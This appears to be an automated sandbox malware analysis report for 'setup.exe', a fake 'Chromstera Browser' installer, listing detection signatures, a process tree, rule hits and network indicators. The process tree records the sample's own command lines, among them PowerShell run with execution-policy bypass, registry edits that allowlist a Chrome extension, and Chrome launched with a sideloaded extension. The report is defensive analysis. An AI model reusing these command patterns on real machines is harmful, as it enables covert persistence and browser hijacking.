Windows Analysis Report
setup.exe

Overview

General Information

Sample name: setup.exe
Analysis ID: 1544057
MD5: 8aca54559265d2a9ad0a810c425c644f
SHA1: 39d22f9333c9682bb860cf644d66996f7a641666
SHA256: af11a10ef1964b801f070d073cf89f3b4e6eecab2943af9cb011151df65ecfd2

Detection

Score: 81
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 49
Range: 0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MalDoc
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Contains functionality to detect sleep reduction / modifications
Drops executables to the windows directory (C:\Windows) and starts them
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Chromium Browser Instance Executed With Custom Extension
Sigma detected: Suspicious Script Execution From Temp Folder
Uses cmd line tools excessively to alter registry or file data
Adds / modifies Windows certificates
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a Chrome extension
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Always Install Elevated MSI Spawned Cmd And Powershell
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Chromium Browser Instance Executed With Custom Extension
Sigma detected: Suspicious MsiExec Embedding Parent
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • setup.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: 8ACA54559265D2A9AD0A810C425C644F)
    • setup.exe (PID: 7728 cmdline: "C:\Users\user\Desktop\setup.exe" /i "C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Chromstera Browser" SECONDSEQUENCE="1" CLIENTPROCESSID="7404" AI_MORE_CMD_LINE=1 MD5: 8ACA54559265D2A9AD0A810C425C644F)
  • msiexec.exe (PID: 7496 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7540 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding DD3B85FC1F11BB110F90DDDEF4702234 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7812 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C76E3ECFDACF14783EC0EC85D3ECBB2C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • powershell.exe (PID: 5480 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7488 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1394.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1332.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1333.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1334.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7912 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding CB2789DE8A953DFC6FBB92EF73C3F598 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • powershell.exe (PID: 7964 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSI4739.tmp (PID: 7176 cmdline: "C:\Windows\Installer\MSI4739.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "C:\Users\user\AppData\Local\Temp\" "C:\Users\user\AppData\Local\Temp\chrome.bat" MD5: 514314174B6F6A3AB2195C456B83AA1E)
      • cmd.exe (PID: 7840 cmdline: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 1196 cmdline: REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • reg.exe (PID: 7944 cmdline: REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • reg.exe (PID: 2416 cmdline: REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • reg.exe (PID: 3332 cmdline: REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • reg.exe (PID: 7980 cmdline: REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • reg.exe (PID: 5472 cmdline: REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • chrome.exe (PID: 8064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 5804 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,10222868034098351333,13685129222229150854,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • timeout.exe (PID: 5852 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 6408 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 6220 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 1376 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 7768 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 764 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 7624 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 5560 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 5272 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 2308 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 6260 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 3248 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 6636 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 7112 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 5560 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 7288 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 5928 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 2736 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 3096 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 3448 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 1012 cmdline: timeout 5 MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • MSIFB77.tmp (PID: 6236 cmdline: "C:\Windows\Installer\MSIFB77.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "C:\Users\user\AppData\Local\Temp\" "C:\Users\user\AppData\Local\Temp\edge.bat" MD5: 514314174B6F6A3AB2195C456B83AA1E)
      • cmd.exe (PID: 6484 cmdline: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\edge.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ChromsteraUpdater.exe (PID: 8100 cmdline: "C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe" MD5: 427C459E138B4F33819558D451E8500E)
  • svchost.exe (PID: 8056 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • chrome.exe (PID: 7668 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2012,i,17522224552689378138,6417613085102451852,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 4464 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3164 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1992,i,14024855596687576691,10802708795507051728,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
setup.exe | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Source | Rule | Description | Author | Strings
C:\Windows\Installer\6bc77d.msi | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
C:\Windows\Installer\6bc77d.msi | JoeSecurity_MalDoc | Yara detected MalDoc | Joe Security |
C:\Windows\Installer\MSICC46.tmp | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi | JoeSecurity_MalDoc | Yara detected MalDoc | Joe Security |

Source | Rule | Description | Author | Strings
Process Memory Space: setup.exe PID: 7404 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: setup.exe PID: 7728 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: powershell.exe PID: 7964 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_7964.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

                      System Summary

                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding C76E3ECFDACF14783EC0EC85D3ECBB2C, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7812, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 5480, ProcessName: powershell.exe
                      Source: Process startedAuthor: Aedan Russell, frack113, X__Junior (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper", CommandLine|base64offset|contains: Zv, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7840, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper", ProcessId: 8064, ProcessName: chrome.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding C76E3ECFDACF14783EC0EC85D3ECBB2C, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7812, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 5480, ProcessName: powershell.exe
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" ", CommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\Installer\MSI4739.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "C:\Users\user\AppData\Local\Temp\" "C:\Users\user\AppData\Local\Temp\chrome.bat", ParentImage: C:\Windows\Installer\MSI4739.tmp, ParentProcessId: 7176, ParentProcessName: MSI4739.tmp, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" ", ProcessId: 7840, ProcessName: cmd.exe
                      Source: Process startedAuthor: frack113: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding CB2789DE8A953DFC6FBB92EF73C3F598 E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7912, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7964, ProcessName: powershell.exe
                      Source: Process startedAuthor: Aedan Russell, frack113, X__Junior (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper", CommandLine|base64offset|contains: Zv, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7840, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper", ProcessId: 8064, ProcessName: chrome.exe
                      Source: Process startedAuthor: frack113: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding C76E3ECFDACF14783EC0EC85D3ECBB2C, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7812, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 5480, ProcessName: powershell.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding CB2789DE8A953DFC6FBB92EF73C3F598 E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7912, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7964, ProcessName: powershell.exe
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8056, ProcessName: svchost.exe
                      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                      2024-10-28T19:11:31.949011+0100 | 2829202 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 104.21.8.139 | 443 | TCP

                      AV Detection

                      Source: setup.exe | Avira: detected
                      Source: setup.exe | ReversingLabs: Detection: 41%

                      Compliance

                      Source: setup.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: C:\Windows\System32\msiexec.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Chromstera Browser 1.0.0.0
                      Source: setup.exe | Static PE information: certificate valid
                      Source: unknown | HTTPS traffic detected: 104.21.8.139:443 -> 192.168.2.4:49734 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49736 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:49754 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49755 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:59273 version: TLS 1.2
                      Source: setup.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: wininet.pdb source: setup.exe, 00000000.00000003.1719958497.0000000005251000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000003.00000003.1746421738.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, shi3105.tmp.0.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbR source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdbg source: setup.exe, MSIEC26.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: n.pdb" source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: 31bf3856ad364e35corlib.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E2D6000.00000004.00000020.00020000.00000000.sdmp
